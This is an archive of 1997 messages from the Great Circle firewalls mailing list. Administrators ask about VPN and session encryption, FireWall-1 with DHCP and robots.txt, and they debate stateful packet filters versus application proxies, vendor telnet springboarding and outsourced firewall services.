--openmail-part-00cc2f3f-00000001
Content-Type: application/octet-stream; name="1.txt"
Content-Disposition: attachment; filename="1.txt"
Content-Transfer-Encoding: base64
--openmail-part-00cc2f3f-00000001
Content-Type: text/plain; charset=US-ASCII; name="Returned"
Content-Disposition: inline; filename="Returned"
Content-Transfer-Encoding: 7bit

Is the session between the ICA client and the server encrypted ? If so, what encryption techniques are used ? If anyone has implemented this, I'm curious about how much work it is to administer ?
TIA,
David Burns

--openmail-part-00cc2f3f-00000001--

From owner-firewalls-outgoing Mon Jun 9 06:55:47 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA24659 for firewalls-outgoing; Mon, 9 Jun 1997 06:29:10 -0700 (PDT)
Received: from proxy.src.siemens.es (ms1.src.siemens.es [195.53.72.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA24519 for ; Mon, 9 Jun 1997 06:28:39 -0700 (PDT)
Received: from cceballos.src.siemens.es by proxy.src.siemens.es with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1457.7) id MS2CPM7Q; Mon, 9 Jun 1997 15:33:19 +0200
Message-ID: <339C06B3.60DA@src.siemens.es>
Date: Mon, 09 Jun 1997 15:35:47 +0200
From: Cristina Ceballos
Reply-To: cceballos@src.siemens.es
Organization: Siemens Redes Corporativas
X-Mailer: Mozilla 3.0Gold (Win95; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: SecuRemote on FireWall-1 3.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I am trying to use Securemote to access the internal network from the internet in an encrypted manner. In order to do that I have to install the securemote client on the PC accessing my network from the Internet and also, on the server's side, Securemote is implemented on top of a Firewall-1 Virtual Private network.

My questions are:
Is a Virtual Private Network just an object (network type) I have to define????
Do I need to have a Certified Key in order to be able to use this encryption???? (I shouldn't..)

If anyone is using SecureRemote I would appreciate your help.

Thanks.
Cristina Ceballos
--

From owner-firewalls-outgoing Mon Jun 9 07:53:13 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA06221 for firewalls-outgoing; Mon, 9 Jun 1997 07:28:13 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA06100 for ; Mon, 9 Jun 1997 07:27:45 -0700 (PDT)
Received: from newman by newman (SMI-8.6/SMI-SVR4) id KAA04840; Mon, 9 Jun 1997 10:25:29 -0400
Message-ID: <339C1259.E207AD87@unifiedtech.com>
Date: Mon, 09 Jun 1997 10:25:29 -0400
From: Mike Jones
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u)
MIME-Version: 1.0
To: Darren Reed
CC: hagan@cih.com, Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM
Subject: Re: Stateful Packet Filters vs. Proxies
X-Priority: 3 (Normal)
References: <199706091251.FAA20404@honor.greatcircle.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Darren Reed wrote:
> Darren Reed writes...
> In some mail from Craig I. Hagan, sie said:
> > > Sure, an FTP proxy that can decrypt your
> > > encrypted FTP session will work, same as
> > > a SPF with the same features will.
> > > If a SPF or a proxy can act as one endpoint
> > > of an encrypted connection, it can watch
> > > for the port command and deal with it.
> > > You seem to be under the impression that SPFs
> > > aren't capable of understanding the protocol
> > > being routed... if that were the case, the non-encrypted
> > > FTP session wouldn't work over the PIX box with NAT
> > > enabled, would it? There is no reason that the SPF
> > > software can't be designed to act as an encryption
> > > endpoint, but apparently the PIX hasn't for FTP.
> > I agree with you that you can make an SPF which can
> > handle any case that a proxy can. However, it is far
> > easier for the end user (read f/w implementor) to modify
> > proxy code such that it will match the requirements
> > of his/her site than it is for the end user to modify
> > an SPF.
> Add to this discussion that, to date, SPF's (and in-kernel proxies)
> have
> yet to be proven to be as reliable as real proxies. There have been
> cases emerge here in which the flaws in current implementations (of
> SPFs)
> became evident.

Details, please? Which flaws? What cases? This is clearly the conventional wisdom, but details are very hard to come by.

I'll admit right up front that I'm interested because we sell FW-1; if there are serious problems with the product, I want to know so I can stop recommending it to people.

--
Mike Jones
Sr. Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Mon Jun 9 08:01:40 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA08832 for firewalls-outgoing; Mon, 9 Jun 1997 07:41:51 -0700 (PDT)
Received: from nebula.is.rpslmc.edu (nebula.is.rpslmc.edu [144.74.19.111]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA08736 for ; Mon, 9 Jun 1997 07:41:30 -0700 (PDT)
Received: (qmail 24047 invoked by uid 2001); 9 Jun 1997 14:46:37 -0000
Date: Mon, 9 Jun 1997 09:46:36 -0500 (CDT)
From: "Daniel G. Drumm"
To: Hidayatullah Khan
cc: "Firewalls@GreatCircle.COM"
Subject: Re: Restrict Springboarding
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sun, 8 Jun 1997, Hidayatullah Khan wrote:

> Hello All,
> Ours is a large organization with a class B addressing. We have a
> firewall in place to allow outgoing web and mail services. Often we
> have vendors coming in to our systems to support their applications. Our
> firewall is configured to allow the vendors to telnet to specific hosts.
> On a couple of occasions I have noticed a vendor's presence on a
> different host for which he was not intended to. My question is how can
> we restrict a vendor from "springboarding" (i.e. telnetting to other
> machines on our network) from the actual specific host.
> Thanks in Adv,
> Khan
>
> Khan@Bigfoot.com
>

Two answers:

1. Install wrappers on all the hosts that disallow telnet between themselves. Perhaps unruly, or untenable.

2. Install a restricted shell for the vendor, which allows them a highly restricted subset of commands needed only to get the work done. Disallow telnet to that account. Perhaps wrap telnet and rlogin.

3. Place a sniffer unit with logging on a segment. Log for outbound telnet from a machine with the "offending" login. Once logged, present to your legal department, or the vendor's legal department, or something scary and litigious like that.

--
Daniel G. Drumm - ddrumm@rush.edu
Rush Presbyterian St. Luke's Medical Center - Chicago, IL
Network Division - Information Services

From owner-firewalls-outgoing Mon Jun 9 08:10:28 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA12904 for firewalls-outgoing; Mon, 9 Jun 1997 08:06:23 -0700 (PDT)
Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA12855 for ; Mon, 9 Jun 1997 08:06:09 -0700 (PDT)
Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id LAA20483; Mon, 9 Jun 1997 11:07:21 -0400
X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f
Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd20480aaa; Mon Jun 9 15:07:14 1997
Date: Mon, 9 Jun 1997 11:07:14 -0400 (EDT)
From: "Craig I. Hagan"
Reply-To: hagan@cih.com
To: Darren Reed
cc: Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To: <199706091251.FAA20404@honor.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Add to this discussion that, to date, SPF's (and in-kernel proxies) have
> yet to be proven to be as reliable as real proxies. There have been
> cases emerge here in which the flaws in current implementations (of SPFs)
> became evident.
>
> FWIW, a SPF != a proxy

agreed. if i may extend your point, it is also easier to verify a proxy agent than it is an SPF as you have many more controls that you can use in your experiment:

* source code review
* easier black box testing - you can move the proxy agent through a set of known operating systems to reduce the amount of possible os contamination in your tests

my issues with SPFs aren't that they can't be secure, but, that they are being mismarketed.
i don't think that everyone needs maximal security, but, people should understand the tradeoffs that they are making when they choose technology A over B, e.g. choosing an SPF (or similar strategy) over a proxy.

> And whilst "anything is possible", current SPF technology does not yet
> appear to have advanced far enough to allow them to work as universally
> well as proxies.

I would like to see what the cpu requirements would be to f/w a T3, 100mb ethernet, and (where possible) 1gb ethernet connections using proxies on the following (optimally configured, of course):

* commercial unix hw+sw (e.g. sun, alpha +osf/1)
* commercial unix sw + pc hw (e.g. stuff like solaris x86, bsdi)
* commercial hw + PD unices (e.g.alpha+linux/*bsd;sun+linux/*bsd,etc)
* pc hw, pd unix (pc+linux/*bsd, etc)

but, hey, that is wishful thinking on my part :)

-- craig

-------------------------------------------------------------------------------
Craig I. Hagan "It's a small world, but I wouldn't want to back it up"
hagan@cih.com "True hackers don't die, their ttl expires"
"It takes a village to raise an idiot, but an idiot can raze a village"

From owner-firewalls-outgoing Mon Jun 9 08:47:28 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA08170 for firewalls-outgoing; Mon, 9 Jun 1997 07:37:33 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA08146 for ; Mon, 9 Jun 1997 07:37:25 -0700 (PDT)
Message-Id: <199706091437.HAA08146@honor.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA265396701; Tue, 10 Jun 1997 00:31:41 +1000
From: Darren Reed
Subject: Re: Stateful Packet Filters vs. Proxies
To: mike.jones@unifiedtech.com (Mike Jones)
Date: Tue, 10 Jun 1997 00:31:41 +1000 (EST)
Cc: hagan@cih.com, Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM
In-Reply-To: <339C1259.E207AD87@unifiedtech.com> from "Mike Jones" at Jun 9, 97 10:25:29 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Mike Jones, sie said:
>
> Darren Reed wrote:
>
> > Darren Reed writes...
> > In some mail from Craig I. Hagan, sie said:
> > > > Sure, an FTP proxy that can decrypt your
> > > > encrypted FTP session will work, same as
> > > > a SPF with the same features will.
> > > > If a SPF or a proxy can act as one endpoint
> > > > of an encrypted connection, it can watch
> > > > for the port command and deal with it.
> > > > You seem to be under the impression that SPFs
> > > > aren't capable of understanding the protocol
> > > > being routed... if that were the case, the non-encrypted
> > > > FTP session wouldn't work over the PIX box with NAT
> > > > enabled, would it? There is no reason that the SPF
> > > > software can't be designed to act as an encryption
> > > > endpoint, but apparently the PIX hasn't for FTP.
> > > I agree with you that you can make an SPF which can
> > > handle any case that a proxy can. However, it is far
> > > easier for the end user (read f/w implementor) to modify
> > > proxy code such that it will match the requirements
> > > of his/her site than it is for the end user to modify
> > > an SPF.
> > Add to this discussion that, to date, SPF's (and in-kernel proxies)
> > have
> > yet to be proven to be as reliable as real proxies. There have been
> > cases emerge here in which the flaws in current implementations (of
> > SPFs)
> > became evident.
>
> Details, please? Which flaws? What cases? This is clearly the
> conventional wisdom, but details are very hard to come by.
>
> I'll admit right up front that I'm interested because we sell
> FW-1; if there are serious problems with the product, I want to
> know so I can stop recommending it to people.

In several reports, last year, it became apparent that Gauntlet (and I suspect the FWTK) would not work with FW1 because the "PORT" command was split over two packets (although this is now claimed to be fixed).

The point being, FW1 doesn't try to recreate the upper layers of data properly, so anything which doesn't fit in one packet requires them to provide "special case handling". What they (and consumers) don't seem to realise is that all of TCP is a "special case". Consequently, their entire suite of TCP proxies could be considered to be "flawed".

If you're curious about "how", then look at the Linux FTP masquerade code - it too looks for everything in one packet (when I last looked).

Darren

From owner-firewalls-outgoing Mon Jun 9 10:07:02 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA29684 for firewalls-outgoing; Mon, 9 Jun 1997 09:40:22 -0700 (PDT)
Received: from lancomp-gate.LANcomp.COM (lancomp-gate.lancomp.com [199.170.17.253]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA26788 for ; Mon, 9 Jun 1997 09:21:49 -0700 (PDT)
Received: from devils.LANcomp.COM by lancomp-gate.LANcomp.COM via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 9 Jun 1997 16:22:33 UT
Received: from localhost by LANcomp.COM (5.x/SMI-SVR4) id AA18372; Mon, 9 Jun 1997 12:22:33 -0400
Date: Mon, 9 Jun 1997 12:22:33 -0400 (EDT)
From: Mike Ordun
X-Sender: mro@devils
To: firewalls@greatcircle.com
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Have been following this discussion with a lot of interest as a reseller of both SPF and proxy firewalls.
I happen to believe that both are appropriate in different circumstances and customer need. Nevertheless, I am a little troubled by the claims that SPFs are inherently insecure.

Let me present a challenge. Let's compare some specific commercial offerings -- Firewall-1 in one corner representing SPF and say Gauntlet, Raptor, or ANS in the other representing the proxy approach. What I would like is some specific vulnerability that I cannot protect myself from using the SPF as opposed to the proxy approach. Again just for emphasis, I am interested in specific vulnerabilities not just restatement that in theory proxies are better because they deal with the protocol at the application layer.

My somewhat cynical hypothesis, until proven wrong with specific example, is that the majority of proxies are really not better and in fact may be no more than a disguised SPF with address translation.

Mike Ordun
mordun@lancomp.com

From owner-firewalls-outgoing Mon Jun 9 10:16:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA13665 for firewalls-outgoing; Mon, 9 Jun 1997 08:10:53 -0700 (PDT)
Received: from docws001.shl.com (docws001.shl.com [159.249.56.252]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA13645 for ; Mon, 9 Jun 1997 08:10:40 -0700 (PDT)
Received: from ottmsooc02.ooc.shl.com (ottmsooc02.ooc.shl.com [159.249.112.25]) by docws001.shl.com (8.7.3/8.7.3) with SMTP id KAA32978 for ; Mon, 9 Jun 1997 10:00:36 -0500
Received: by ottmsooc02.ooc.shl.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC74C5.FA185810@ottmsooc02.ooc.shl.com>; Mon, 9 Jun 1997 11:12:11 -0400
Message-ID:
From: SMITH Michael
To: "'Firewalls@GreatCircle.COM'"
Subject: FW: ISP Connection
Date: Mon, 9 Jun 1997 11:07:00 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I haven't seen anyone else mention this in this thread, so...

It seems there is an ISP that is making a name for itself as a very secure service provider. They are Pilot Network Systems. According to an article in Fortune magazine (Feb. 3, '97):

"Rather than connect directly to the Internet, Pilot's corporate clients hook their networks to one of the company's service centers around the country. There, for about $5,000 per client per month, Pilot provides supervised Internet access. This involves a 'dynamic' five-layered firewall with data pathways it routinely alters to fool hackers. The system is monitored around the clock by a team of electronic cops (human ones). ... Last year, Trident Data Systems... conducted an independent review of Pilot's system. Its report concluded that 'of all the various audits Trident has performed, Pilot was by far the most secure network we have encountered.'"

I don't know much else about them. They have a web site at http://www.pilot.net/. Their firewall is proprietary. I haven't looked at the details so I can't say much more about their architecture.
Mike Smith
Security Consultant
SHL Systemhouse, An MCI Company

From owner-firewalls-outgoing Mon Jun 9 10:31:05 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA05784 for firewalls-outgoing; Mon, 9 Jun 1997 10:19:31 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA05769 for ; Mon, 9 Jun 1997 10:19:22 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id KAA26975 for ; Mon, 9 Jun 1997 10:23:32 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA09380; Mon, 9 Jun 97 10:21:21 PDT
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id KAA07563 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 10:20:11 -0700 (PDT)
Message-Id: <199706091720.KAA07563@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 9C72B508231CABF6882564B1005F6632; Mon, 9 Jun 97 10:20:06 EDT
To: "Craig I. Hagan"
Cc: Ryan Russell/SYBASE , Darren Reed , sjg , firewalls
From: Ryan Russell/SYBASE
Date: 9 Jun 97 10:24:09 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If you claim they are different because they are written differently, sure, I'll buy that. My claim was based on how they functioned, what happened to packets on the way through, and what level of security they provide. I should have clarified. My argument was based on how they appear to behave from the outside, black-box style.

Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: avalon, sjg, firewalls
From: hagan@cih.com ("Craig I. Hagan") @ smtp
Date: 06/09/97 12:56:03 PM
Subject: Re: Stateful Packet Filters vs. Proxies

> my personal experience has been good.
>
> I disagree that a SPF != a proxy, at least not
> entirely.

you make an interesting argument. I will assert my belief that SPFs and proxies represent something akin to convergent evolution -- are bats special cases of birds, marsupial mice special cases of mice, etc? Admittedly, unlike evolution, we have a situation where people can learn from others' successes and failures. Things may look like ducks, quack like ducks, but if their DNA/source says "not a duck" it ain't a duck.

Why do i believe that they are fundamentally different? SPFs are implemented as an adjunct to the IP stack of the machine -- basically it requires down and dirty OS level code in order to operate. Proxies don't. Merely because the SPF looks and acts like a dumb proxy doesn't make it a dumb proxy -- nor does it make dumb proxies special cases of SPF's.

Now, an important adjunct: i'm merely addressing your assertion that SPFs and proxies belong to the same family of things, be it SPFs being special cases of proxies, or vice versa. I believe that the arguments over which is more secure are beyond the scope of this reply, and have more to do with availability and ease of modifying the source code to both (i'd rather an SPF with rebuildable source than a proxy w/o it). Of course, there are many other factors to add into this equation, but, i'm digressing and risking flamage :)

-- craig

-------------------------------------------------------------------------------
Craig I. Hagan      "It's a small world, but I wouldn't want to back it up"
hagan@cih.com       "True hackers don't die, their ttl expires"
                    "It takes a village to raise an idiot, but an idiot can raze a village"

From owner-firewalls-outgoing Mon Jun 9 10:40:26 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA08015 for firewalls-outgoing; Mon, 9 Jun 1997 10:32:56 -0700 (PDT)
Received: from eclipse.ncmi-gsl.com (postoffice.ncmi-ny.com [206.25.169.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA07960 for ; Mon, 9 Jun 1997 10:32:43 -0700 (PDT)
Received: from ny_nx_mail1.ncmi-gsl.com by eclipse.ncmi-gsl.com (8.7.5/8.7.3) with SMTP id NAA00650 for ; Mon, 9 Jun 1997 13:33:16 -0400 (EDT)
Received: from cygni by ny_nx_mail1.ncmi-gsl.com (NX5.67f2/NX3.0M) id AA02251; Mon, 9 Jun 97 13:33:16 -0400
Message-Id: <9706091733.AA02251@ny_nx_mail1.ncmi-gsl.com>
Received: by cygni.ncmi-ny.com (NX5.67f2/NX3.0X) id AA01220; Mon, 9 Jun 97 13:33:16 -0400
Content-Type: text/plain
Mime-Version: 1.0 (NeXT Mail 3.3 v118.2)
Received: by NeXT.Mailer (1.118.2)
From: Donald Branch
Date: Mon, 9 Jun 97 13:33:15 -0400
To: firewalls@GreatCircle.com
Subject: DHCP and firewall1
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Has anyone configured firewall 1 to work with DHCP? Can someone tell me how they went about this issue.

Donald Branch
Unix sysAdmin
NationsBanc

P.S.
Faith is finding answers in the heart

From owner-firewalls-outgoing Mon Jun 9 10:41:03 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA28173 for firewalls-outgoing; Mon, 9 Jun 1997 09:30:30 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA28152 for ; Mon, 9 Jun 1997 09:30:23 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id JAA20856 for ; Mon, 9 Jun 1997 09:34:35 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA00386; Mon, 9 Jun 97 09:32:24 PDT
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id JAA03973 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 09:31:14 -0700 (PDT)
Message-Id: <199706091631.JAA03973@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 35F8B5CBAC7B8D72882564B1005AD98B; Mon, 9 Jun 97 09:31:11 EDT
To: Darren Reed
Cc: hagan , sjg , firewalls
From: Ryan Russell/SYBASE
Date: 9 Jun 97 9:36:08 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm not sure how one would measure reliability, but my personal experience has been good.

I disagree that a SPF != a proxy, at least not entirely. Check out: http://futon.sfsu.edu/~rrussell/spfvprox.htm

I might also disagree that SPFs do not work universally well as proxies. You'd have to explain to me what you mean by that exactly...

The only difficulty I've had with the SPFs I have used is with UDP, something that many proxies have difficulty with as well.
Ryan

---------- Previous Message ----------
To: hagan
cc: Ryan.Russell, sjg, firewalls
From: avalon@coombs.anu.edu.au (Darren Reed) @ smtp
Date: 06/09/97 10:45:58 PM
Subject: Re: Stateful Packet Filters vs. Proxies

Add to this discussion that, to date, SPF's (and in-kernel proxies) have yet to be proven to be as reliable as real proxies. There have been cases emerge here in which the flaws in current implementations (of SPFs) became evident.

FWIW, a SPF != a proxy

And whilst "anything is possible", current SPF technology does not yet appear to have advanced far enough to allow them to work as universally well as proxies.

Darren

From owner-firewalls-outgoing Mon Jun 9 11:16:26 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA08471 for firewalls-outgoing; Mon, 9 Jun 1997 10:35:14 -0700 (PDT)
Received: from gate (MNA-cal-mcc-a-pvc253.econnect.net [204.50.214.50]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA08366 for ; Mon, 9 Jun 1997 10:34:52 -0700 (PDT)
Received: from a01fs002.nsci.net ([10.1.1.20]) by gate.mcc.net with ESMTP id <324834-1018>; Mon, 9 Jun 1997 11:35:36 -0600
Received: by A01FS002.mcc.net with Internet Mail Service (5.0.1457.3) id ; Mon, 9 Jun 1997 11:35:33 -0600
Message-ID:
From: "Paquette, Trevor"
To: "'John Kemker'" , firewalls@GreatCircle.COM
Subject: RE: ISP Connection
Date: Mon, 9 Jun 1997 11:35:32 -0600
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1457.3)
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have no idea about what the clause actually covers.. I'm not a legal beagle, nor do I want to be.

Having someone run your ISP services, I.E. firewall, is akin to having a security firm make deliveries for you. (OK this might be stretching it a bit..) Banks, rarely, if ever, make deliveries. They hire out a security company whose job it is to make secure, reliable deliveries.
Many banks (in Canada at least) use Brinks as an example. Brinks cannot 100% guarantee that no theft attempt will ever occur, but having them protect the bank's money sure does lessen the chance than if employee joe-schmoe did it himself.

I am not saying that we can stop all break-ins through the firewall. (Anyone who does is lying to you, and you need to change Firewall administrators right away!) But by having a company that knows firewalls, one that understands your needs and services, one that knows the threats that exist and remains current to the potential threats. That company has a much better chance of preventing break-ins than if you give it, as yet another responsibility, to an untrained employee.

But hey.. you did it in house therefore it MUST be cheaper.. and more secure. (Not always.)

> -----Original Message-----
> From: John Kemker [SMTP:john.kemker@pfsfhq.com]
> Sent: Monday, June 09, 1997 6:25 AM
> To: firewalls@GreatCircle.COM
> Subject: RE: ISP Connection
>
> I'm still curious about the indemnification clause. Lawyers like to
> reduce liability. It's their job. Insurance company lawyers like it even
> more than most. (Notice who I work for.) I would be very surprised if
> your insurance lawyers did not assist your corporate lawyers in crafting a
> carefully worded set of clauses in your contracts limiting your liability
> (and, therefore, the amount they would have to pay on a claim) to the
> very least amount possible.
>
> This reminds me of the situation that occurred when they were building
> the Hancock building in Boston. The builder had specified a particular
> size glass, but the glass company had delivered a slightly smaller size
> glass. A particularly nasty wind cropped up and pulled huge sheets of glass
> off the building and blew them all over Boston. Hancock went to the
> contractor, who in turn went to the subcontractor (the glass company).
> They insisted on being recompensed for the damages.
> The glass company
> filed a claim with their insurance company...
>
> ...John Hancock was their insurance company.
>
> Firewalls Moral: Be careful to know who is liable in case of a problem.
> It may be you.
>
> =========== REPLY PARTITION ===========
>
> On 06/06/97, at 05:15 PM, Paquette, Trevor wrote:
>
> >We have insurance for damage that may be caused by a break in.
> >I don't know what type of insurance it is, but it is supposed to cover
> >us in those situations.
> >
> >
> >> However what I'm curious about is whether mcc.net is really completely
> >> "on the hook" in this situation. BBN's SitePatrol, for example, comes
> >> with an extensive indemnification clause in its agreements ("if you're
> >> broken into, we're not liable"). Are you saying that mcc.net doesn't
> >> have one of these clauses in their agreements?
> >>
>
> John E. Kemker III
> Systems Engineer, Primerica Financial Services
> 3120 Breckinridge Blvd., Duluth, GA 30199

From owner-firewalls-outgoing Mon Jun 9 12:16:59 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA00839 for firewalls-outgoing; Mon, 9 Jun 1997 09:45:04 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA00661 for ; Mon, 9 Jun 1997 09:44:33 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id JAA22412 for ; Mon, 9 Jun 1997 09:48:44 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA03070; Mon, 9 Jun 97 09:46:33 PDT
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id JAA04938 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 09:45:23 -0700 (PDT)
Message-Id: <199706091645.JAA04938@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id CDD8AD1BCAAF60F9882564B1005C2FE9; Mon, 9 Jun 97 09:45:22 EDT
To: Darren Reed
Cc: firewalls
From: Ryan Russell/SYBASE
Date: 9 Jun 97 9:51:38 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The FTP port command thing was fixed, I don't know in what version.

I don't know what you mean by not recreating the upper layers of data. The reason FTP requires special handling is because of the way FTP works, not TCP. All of TCP is not a special case, as FTP is. There are a whole bunch of applications that work as telnet-style TCP that one's SPF/proxy doesn't need to have a clue about unless you want to do some kind of filtering.

Ryan

---------- Previous Message ----------
To: mike.jones
cc: hagan, Ryan.Russell, sjg, firewalls
From: avalon@coombs.anu.edu.au (Darren Reed) @ smtp
Date: 06/10/97 12:31:41 AM
Subject: Re: Stateful Packet Filters vs. Proxies

In several reports, last year, it became apparent that Gauntlet (and I suspect the FWTK) would not work with FW1 because the "PORT" command was split over two packets (although this is now claimed to be fixed).

The point being, FW1 doesn't try to recreate the upper layers of data properly, so anything which doesn't fit in one packet requires them to provide "special case handling". What they (and consumers) don't seem to realise is that all of TCP is a "special case". Consequently, their entire suite of TCP proxies could be considered to be "flawed".

If you're curious about "how", then look at the Linux FTP masquerade code - it too looks for everything in one packet (when I last looked).
Darren

From owner-firewalls-outgoing Mon Jun 9 12:26:00 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA25873 for firewalls-outgoing; Mon, 9 Jun 1997 12:13:32 -0700 (PDT)
Received: from columbia.digiweb.com (columbia.digiweb.com [206.161.225.22]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA25864 for ; Mon, 9 Jun 1997 12:13:23 -0700 (PDT)
Received: (from dyabolyk@localhost) by columbia.digiweb.com (8.8.5/8.8.5) id PAA17434; Mon, 9 Jun 1997 15:11:44 -0400 (EDT)
Date: Mon, 9 Jun 1997 15:11:44 -0400 (EDT)
From: Jonathan Tobin
To: firewalls@GreatCircle.COM
Subject: robots.txt
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

i am not sure if this is the appropriate place for this kind of inquiry, but I would like to know if anybody has info on how to set up a robots.txt file; as in, what are its capabilities?

--jonathan tobin
www.dyabolyk.com

